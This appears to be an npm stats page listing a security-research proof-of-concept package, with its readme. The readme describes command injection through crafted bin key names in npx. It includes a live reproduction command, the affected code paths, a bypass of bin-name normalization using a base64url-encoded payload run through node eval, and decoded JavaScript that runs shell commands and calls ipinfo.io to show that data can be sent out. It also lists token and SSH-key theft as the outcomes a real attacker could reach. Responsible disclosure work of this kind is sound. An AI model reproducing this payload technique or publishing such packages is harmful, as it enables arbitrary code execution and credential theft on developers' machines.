npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

@ghostsecurity/npx-bin-key-poc

v0.0.2

Published

Security research PoC: command injection via crafted bin key names in npx

Vulnerabilities

Powered byPowered by Snyk
  • 0High
  • 0Medium
  • 0Low

Links

Git

Maintainers

joshlarsenjoshlarsen

Keywords

npmnpx

Readme

@ghostsecurity/npx-bin-key-poc

Security research PoC demonstrating command injection via crafted bin key names in npx / libnpmexec.

This package is for authorized security research only. The injected commands create an empty marker file (npx-poc-pwned) and fetch your public IP info from ipinfo.io to demonstrate network exfiltration capability.

Vulnerability

A malicious package author can set bin key names in package.json containing POSIX shell metacharacters. When a victim runs npx <package>, the bin key is extracted from the fetched manifest, wrapped in double quotes, and passed to sh -c. Double quotes do not prevent $() command substitution in POSIX sh. The escape.sh() function that properly single-quotes values is applied to arguments only — never to the command name.

The consent prompt displays only the package name and version. The malicious bin key name is never shown to the user.

Reproduction

# From any directory:
npx @ghostsecurity/npx-bin-key-poc

# After the command exits:
ls -la npx-poc-pwned
# If this file exists, command injection occurred.

What happens

1. npx fetches the manifest for @ghostsecurity/npx-bin-key-poc
2. Consent prompt shows: "Need to install: @ghostsecurity/[email protected]"
3. User approves — bin key name is NOT visible
4. getBinFromManifest() returns the bin key containing $(node -e "eval(...)")
5. run-script.js wraps it in double quotes (which don't prevent $() expansion)
6. promise-spawn builds: sh -c '"$(node -e "eval(...)")"'
7. Shell evaluates $() — Node decodes and executes the base64url payload:
   a. touch npx-poc-pwned           — creates marker file in cwd
   b. curl -s ipinfo.io             — fetches victim's public IP info
   c. writes response to stderr     — displayed on victim's terminal
8. $() captures empty stdout — command becomes "" — "command not found"

The injected commands have already executed at step 7.

Payload technique

Bin key names are normalized by normalizePackageBin() which runs path.basename() (strips /) and secureAndUnixifyPath() (replaces \ and : with /). This means the bin key cannot contain /, \, or :.

To bypass this, the payload is encoded as JavaScript, base64url-encoded (alphabet A-Za-z0-9-_ — no forbidden characters), and decoded at runtime via node -e "eval(Buffer.from('...','base64url').toString())". Since npx requires Node.js, node is always available. This allows arbitrary commands including complex URLs with paths and query parameters.

The decoded JavaScript:

const e = require("child_process").execSync;
e("touch npx-poc-pwned");
process.stderr.write(e("curl -s ipinfo.io"));
process.stderr.write("\n");

Affected code path

  • libnpmexec/lib/get-bin-from-manifest.js:7 — returns Object.keys(bin)[0] without validation
  • libnpmexec/lib/run-script.js:22args[0] = '"' + args[0] + '"' (double quotes, not single)
  • @npmcli/promise-spawn/lib/index.js:78,118-121escape.sh() applied to args, not command name

Impact

Arbitrary command execution as the victim user. An attacker publishes a package to any npm registry. The victim runs npx <package> and approves the install prompt (which reveals nothing suspicious). The injected commands run with the victim's full privileges.

A real attacker could exfiltrate environment variables, tokens, SSH keys, or install persistent backdoors — all triggered by a single npx invocation.

Variants: $(), backtick `...`, and double-quote breakout "$(...)" all work.